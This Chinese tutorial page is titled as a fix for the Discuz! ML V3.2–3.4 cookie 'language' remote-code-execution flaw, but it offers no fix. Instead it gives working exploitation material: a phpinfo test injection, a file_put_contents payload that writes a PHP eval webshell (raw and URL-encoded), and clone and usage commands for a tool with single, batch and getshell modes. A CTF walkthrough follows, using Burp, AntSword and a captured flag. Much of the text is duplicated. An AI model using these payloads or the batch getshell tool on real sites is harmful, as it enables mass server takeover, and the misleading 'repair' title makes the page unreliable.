您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程
Discuz ML RCE漏洞修复
海安2025-07-05Discuz教程已有人查阅
导读Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。
1、漏洞描述
Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。
2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。
3、影响版本:
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.4
4、利用exp,进行上传一句话木马
1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
2.抓包找到cookie的language的值修改为xxxx_xxxx_language=sc'.phpinfo().'
3.getshell 的payload: ’.file_put_contents(‘shell.php’,urldecode(’<?php eval($_POST["cmd"]);?>’)).',url编码后的形式是
5、利用dz-ml-rce.py工具进行分析。本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。
6、如何下载dz-ml-rce.py工具
在python2.7的环境中安装,安装命令如下:
使用时加上漏洞PHP页面(如forum.php,portal.php),直接写域名可能会重定向导致误报。
使用帮助:python dz-ml-rce.py -h
判断模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php"
cmdshell模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php" --cmdshell
getshell模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php" --getshell
批量检测:python dz-ml-rce.py -f urls.txt
批量getshell:python dz-ml-rce.py -f urls.txt --getshell
8、实战分析:
当我们进入这个网址后,可以发现它的cms类型是Discuz! X3.2,这是一个比较老的版本,我们可以去乌云,0组查看相关思路文章,发现比较少
于是我们去百度中搜索这个Discuz! X3.2的漏洞可以get shell,所以这道题目考察的一定是cms的漏洞
而我们去网上查的话,有很多的漏洞,比如构建的请求报文,请求报文中含有恶意的PHP代码,任意删除文件,代码注入漏洞等多种漏洞
本网站我所利用的是构建的请求报文,请求报文中含有恶意的PHP代码这一漏洞,也就是Discuz ML RCE漏洞,后面又一篇文章专门写此漏洞
所以我们可以知道它存在cms漏洞:Discuz! X3.2 漏洞 中的 构建的请求报文(恶意的PHP代码,一句话木马)漏洞
所以这个题我们可以考虑使用bur抓包改包,上传一句话木马,get shell
我们对bur进行抓包:
抓包后我们可以发现在cookie字段中有xxxx_xxxx_language字段,所以我们对其进行改包
先看phpinfo文件,看是否存在相关漏洞(验证)
发现存在相关漏洞,所以我们直接上传一句话木马,构造的形式如下:
我们使用蚁剑进行连接
连接成功:
最终我们就可以发现flag的文件,也就是此题的答案flag就在其中,打开之后就是答案,也就是flag,flag{49c883689da71363809d64b8b48679ba}此题完成
Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。
2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。
3、影响版本:
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.4
4、利用exp,进行上传一句话木马
1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
2.抓包找到cookie的language的值修改为xxxx_xxxx_language=sc'.phpinfo().'
3.getshell 的payload: ’.file_put_contents(‘shell.php’,urldecode(’<?php eval($_POST["cmd"]);?>’)).',url编码后的形式是
%27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27
所以我们可以考虑使用bur抓包改包,上传一句话木马,get shell5、利用dz-ml-rce.py工具进行分析。本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。
6、如何下载dz-ml-rce.py工具
在python2.7的环境中安装,安装命令如下:
git clone https://github.com/theLSA/discuz-ml-rce.git
pip -r requirements.txt
7、如何使用dz-ml-rce.py工具使用时加上漏洞PHP页面(如forum.php,portal.php),直接写域名可能会重定向导致误报。
使用帮助:python dz-ml-rce.py -h
判断模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php"
cmdshell模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php" --cmdshell
getshell模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php" --getshell
批量检测:python dz-ml-rce.py -f urls.txt
批量getshell:python dz-ml-rce.py -f urls.txt --getshell
8、实战分析:
当我们进入这个网址后,可以发现它的cms类型是Discuz! X3.2,这是一个比较老的版本,我们可以去乌云,0组查看相关思路文章,发现比较少
于是我们去百度中搜索这个Discuz! X3.2的漏洞可以get shell,所以这道题目考察的一定是cms的漏洞
而我们去网上查的话,有很多的漏洞,比如构建的请求报文,请求报文中含有恶意的PHP代码,任意删除文件,代码注入漏洞等多种漏洞
本网站我所利用的是构建的请求报文,请求报文中含有恶意的PHP代码这一漏洞,也就是Discuz ML RCE漏洞,后面又一篇文章专门写此漏洞
所以我们可以知道它存在cms漏洞:Discuz! X3.2 漏洞 中的 构建的请求报文(恶意的PHP代码,一句话木马)漏洞
所以这个题我们可以考虑使用bur抓包改包,上传一句话木马,get shell
我们对bur进行抓包:
抓包后我们可以发现在cookie字段中有xxxx_xxxx_language字段,所以我们对其进行改包
先看phpinfo文件,看是否存在相关漏洞(验证)
发现存在相关漏洞,所以我们直接上传一句话木马,构造的形式如下:
%27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27
我们直接在网页上查看shell.php文件,看是否可以正常显示我们使用蚁剑进行连接
连接成功:
最终我们就可以发现flag的文件,也就是此题的答案flag就在其中,打开之后就是答案,也就是flag,flag{49c883689da71363809d64b8b48679ba}此题完成
感谢您的认可和支持
微信
支付宝
本文标签:
很赞哦! ()
上一篇:Discuz!道具系统开发介绍
下一篇:Discuz! X 插件开发教程
相关教程
图文教程
E8820s路由器部署Discuz论坛的方法
40包邮e8820s,mt7621a处理器,默频880mhz,这款路由器的breed里好像没有超频选项,不然超到1100 1200可以提升很大闪存和内存在7621里也算可以了
Discuz!NT初始化过程代码分析
Discuz!NT论坛程序具有强大的配置功能 :从论坛的标题到论坛各个地方的显示,论坛模板的使用等等。要弄明白DNT页面的显示过程,首先应知道ASP.NET页面事件的引发顺序。
Discuz的NT在线用户功能介绍
在上文(Discuz!NT URL地址重写) 中, 聊到了“在线用户”功能,因为当时介绍的重点不是“在线”那一块,所以没做深入介绍。这就为今天这篇文章埋下了“伏笔”。
怎么修改discuz首页logo
如何修改discuz首页logo两种方法简单修改discuz 论坛首页logo,一种是直接从网页后台修改;另外一种是从ftp后台修改。
相关源码
-
(自适应)大气办公用品耗材供应打印机产品维修网站模板下载基于PbootCMS系统开发的响应式网站模板,为营销技术博主、数字产品评测者设计。采用前沿的响应式技术,确保内容在手机端和桌面端都能获得较佳阅读体验,帮助用户高效展示技术文章和产品分析。查看源码 -
(自适应)html5导航目录索引工具类网站源码下载本模板基于PbootCMS开发,为站长导航、网址导航类网站设计。采用HTML5+CSS3技术构建,适配PC端和移动端,提供流畅的浏览体验。适用于个人站长、资源导航平台等场景查看源码 -
(自适应响应式)高端家用办公家具家居桌椅pbootcms模板下载为办公家具企业设计的响应式网站模板,涵盖产品展示、案例呈现、企业介绍等核心模块。通过可视化后台可快速发布实木桌椅、系统家具、办公屏风等产品信息,帮助客户直观了解材质参数与空间搭配方案。查看源码 -
(PC+WAP)餐饮奶茶美食小吃招商加盟pbootcms模板源码下载为茶饮烘焙、小吃快餐等餐饮品牌打造的招商加盟系统,助力品牌快速拓展市场;双端pc+wap设计呈现加盟政策对比表。支持后台实时更新菜品图片、加盟费用等关键信息。查看源码 -
(自适应)蓄电池能源智能数码科技产品pbootcms模板源码下载本款基于PbootCMS开发的网站模板为蓄电池及能源科技企业设计,特别适合锂电池、储能系统、新能源电池等产品的展示与推广。查看源码 -
(自适应)水墨风中药馆中医名医介绍pbootcms网站模板本模板基于PbootCMS内核开发,为中医馆、中医药企业量身定制,可快速搭建具有传统文化特色的官方网站。自适应手机端设计,数据实时同步,助您高效展示中医特色诊疗、中药产品、养生知识等内容,塑造专业品牌形象。查看源码
| 分享笔记 (共有 篇笔记) |
